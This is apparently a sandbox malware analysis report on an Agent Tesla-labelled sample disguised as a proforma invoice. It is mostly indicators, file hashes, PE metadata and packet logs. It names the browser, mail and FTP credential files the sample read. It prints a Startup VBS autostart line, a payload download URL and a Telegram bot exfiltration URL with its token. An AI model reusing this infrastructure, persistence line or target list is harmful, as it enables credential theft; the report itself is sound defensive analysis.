                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.scr.exe.36bf7a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.InstallUtil.exe.340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.EncoderFallback.exe.3cf5570.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2454133386.00000000029D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2755078286.00000000028F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2771284089.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2750748078.0000000000342000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3529968351.00000000028C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2753904041.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2463724121.0000000003766000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3412, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5868, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior

                      Remote Access Functionality

[MITRE ATT&CK matrix; columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
[Behavior graph. ID: 1545982; Sample: Proforma Invoice.scr.exe; Start date: 31/10/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
Proforma Invoice.scr.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
Proforma Invoice.scr.exe | 100% | Avira | HEUR/AGEN.1308518 |
Proforma Invoice.scr.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\EncoderFallback.exe | 100% | Avira | HEUR/AGEN.1308518 |
C:\Users\user\AppData\Roaming\EncoderFallback.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\EncoderFallback.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
https://api.ipify.org/ | 0% | URL Reputation | safe |
https://api.ipify.org | 0% | URL Reputation | safe |
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe |
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe |
https://api.ipify.org/t | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
geocs.mx | 173.237.185.182 | true | false | | unknown
api.ipify.org | 104.26.13.205 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
https://geocs.mx/wp-includes/Hjewct.vdf | false | | unknown
https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/sendDocument | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7245016847:AAHTGgEGytVrrQCnyNC6RGvqcnPdZoR0H5U/ | Proforma Invoice.scr.exe, InstallUtil.exe, EncoderFallback.exe | true | | unknown
https://api.ipify.org | Proforma Invoice.scr.exe, InstallUtil.exe, EncoderFallback.exe | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-neti | Proforma Invoice.scr.exe | false | | unknown
https://stackoverflow.com/q/14436606/23354 | Proforma Invoice.scr.exe, EncoderFallback.exe | false | URL Reputation: safe | unknown
https://account.dyn.com/ | Proforma Invoice.scr.exe, InstallUtil.exe, EncoderFallback.exe | false | URL Reputation: safe | unknown
https://api.telegram.org | InstallUtil.exe | true | | unknown
https://github.com/mgravell/protobuf-netJ | Proforma Invoice.scr.exe | false | | unknown
https://stackoverflow.com/q/11564914/23354; | Proforma Invoice.scr.exe | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | Proforma Invoice.scr.exe | false | URL Reputation: safe | unknown
https://geocs.mx | Proforma Invoice.scr.exe, EncoderFallback.exe | false | | unknown
https://github.com/mgravell/protobuf-net | Proforma Invoice.scr.exe | false | | unknown
https://api.ipify.org/t | InstallUtil.exe | false | URL Reputation: safe | unknown
http://api.telegram.org | InstallUtil.exe | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Proforma Invoice.scr.exe, InstallUtil.exe, EncoderFallback.exe | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
173.237.185.182 | geocs.mx | United States | 394094 | INTELLECTICA-US | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545982
Start date and time: 2024-10-31 11:13:00 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Proforma Invoice.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@4/3
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 275
                                                • Number of non-executed functions: 10
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, azurefd-t-fb-prod.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Proforma Invoice.scr.exe, PID 4000 because it is empty
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: Proforma Invoice.scr.exe
Time | Type | Description
06:14:04 | API Interceptor | 51x Sleep call for process: Proforma Invoice.scr.exe modified
06:14:32 | API Interceptor | 11491x Sleep call for process: InstallUtil.exe modified
06:14:37 | API Interceptor | 38x Sleep call for process: EncoderFallback.exe modified
11:14:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):13312
                                                                                        Entropy (8bit):4.715172253794978
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:Z6F7KvWISi8OXTjyr4mikpAfQZz/IJCKVxmy:ZZNSEDjyHikpAIZz/In
                                                                                        MD5:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        SHA1:194D4304E6FBEA7BCC5203D9F5DD7C0883277FB1
                                                                                        SHA-256:A05ACADB64D5923E931A42AECCA755B6A160B39F96EC1BFF8611CD5116B4C926
                                                                                        SHA-512:73AC5727E012611904CA6BE764A92DB67CBEA082CDACA37017E1B6DB04FEE6BAE884AAF82DCF4EB36094012463DCFD0B5BEECFC36048D87DB01F17DAFE7C32A9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 61%
                                                                                        Reputation:low
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):93
                                                                                        Entropy (8bit):4.768652287031278
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:FER/n0eFHHoN+EaKC5aHE1NHn:FER/lFHIN7aZ5aHEX
                                                                                        MD5:F518BAF451028C74555DE83F663A00C5
                                                                                        SHA1:8D58AEC0203829C98C7D9145E1F0B2295B5AB54F
                                                                                        SHA-256:D0B9F1092C93EA673161222345C664A92E6D19937748DEA7950DE5AD1D545C5D
                                                                                        SHA-512:A23E718787E5095ED8F5567C693C5492B9A9E0215D46000A28EBD6566D34C25E8378C1E93323B996B710AF6CE011C8347F95472061F90024C46B717C6BECA426
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\EncoderFallback.exe"""
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):4.715172253794978
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:Proforma Invoice.scr.exe
                                                                                        File size:13'312 bytes
                                                                                        MD5:3efcf6123cc2697d54be8e8d17f70eb6
                                                                                        SHA1:194d4304e6fbea7bcc5203d9f5dd7c0883277fb1
                                                                                        SHA256:a05acadb64d5923e931a42aecca755b6a160b39f96ec1bff8611cd5116b4c926
                                                                                        SHA512:73ac5727e012611904ca6be764a92db67cbea082cdaca37017e1b6db04fee6bae884aaf82dcf4eb36094012463dcfd0b5beecfc36048d87db01f17dafe7c32a9
                                                                                        SSDEEP:192:Z6F7KvWISi8OXTjyr4mikpAfQZz/IJCKVxmy:ZZNSEDjyHikpAIZz/In
                                                                                        TLSH:F8522714B3658726CCD54BF25EE3C3342370E745BA87DB1E76C22A0F7D953026822B95
                                                                                        Icon Hash:70cccc8692968ec8
                                                                                        Entrypoint:0x402e3e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x67210A4D [Tue Oct 29 16:16:13 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2dec | 0x4f | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x1eba | .rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                        .text | 0x2000 | 0xe44 | 0x1000 | f0079c6edf29c5a0603144764e541d27 | False | 0.537109375 | data | 5.0499331097335824 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc | 0x4000 | 0x1eba | 0x2000 | 0e5638f12d047e611bf41ac2fa3baa56 | False | 0.3956298828125 | data | 4.618045605339171 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc | 0x6000 | 0xc | 0x200 | 103696a02112831d849604d6b00ad7ae | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                        RT_ICON | 0x4130 | 0x1870 | Device independent bitmap graphic, 35 x 84 x 32, image size 5880 |  |  | 0.4040920716112532
                                                                                        RT_GROUP_ICON | 0x59a0 | 0x14 | data |  |  | 1.1
                                                                                        RT_VERSION | 0x59b4 | 0x31c | data |  |  | 0.43090452261306533
                                                                                        RT_MANIFEST | 0x5cd0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
                                                                                        DLL | Import
                                                                                        mscoree.dll | _CorExeMain
                                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                        2024-10-31T11:14:22.467203+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.6 | 49818 | TCP
                                                                                        2024-10-31T11:14:34.440817+0100 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.6 | 49879 | 149.154.167.220 | 443 | TCP
                                                                                        2024-10-31T11:14:34.440817+0100 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 49879 | 149.154.167.220 | 443 | TCP
                                                                                        2024-10-31T11:14:36.494538+0100 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 49890 | 149.154.167.220 | 443 | TCP
                                                                                        2024-10-31T11:14:51.363526+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.6 | 51758 | TCP
                                                                                        2024-10-31T11:14:58.092083+0100 | 2851779 | ETPRO MALWARE Agent Tesla Telegram Exfil | 1 | 192.168.2.6 | 51775 | 149.154.167.220 | 443 | TCP
                                                                                        2024-10-31T11:14:58.092083+0100 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 51775 | 149.154.167.220 | 443 | TCP
                                                                                        2024-10-31T11:14:59.486489+0100 | 2852815 | ETPRO MALWARE Agent Tesla Telegram Exfil M2 | 1 | 192.168.2.6 | 51776 | 149.154.167.220 | 443 | TCP
                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Oct 31, 2024 11:14:08.329546928 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.329555035 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.329732895 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.447479963 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.447493076 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.447654963 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.448041916 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.448117018 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.566170931 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.566266060 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.566816092 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.566895008 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.684581995 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.684705973 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.685129881 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.685252905 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.803282976 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.803394079 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.803821087 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.803890944 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.804177999 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.804254055 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.922250986 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.922406912 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.922653913 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.922729969 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.040585995 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.040774107 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.041317940 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.041393995 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.087747097 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.087966919 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.159427881 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.159532070 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.159811974 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.159895897 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.277735949 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.277882099 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.278232098 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.278311014 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.328166962 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.328360081 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.396398067 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.396512985 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.396591902 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.396665096 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.445055962 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.445158005 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.516258001 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.516463995 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.517055988 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.517134905 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.563637018 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.563844919 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.633291006 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.633397102 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.633960962 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.634041071 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.680864096 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.680948019 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.752073050 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.752161980 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.752557993 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.752649069 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.795464039 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.795612097 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.863620996 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.863845110 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.870812893 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.870920897 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.913877010 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.913959026 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.960865021 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.960957050 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.989140034 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.989248037 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:09.989635944 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:09.989732981 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.036427021 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.036588907 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:10.100744963 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:10.100861073 CET49737443192.168.2.6173.237.185.182
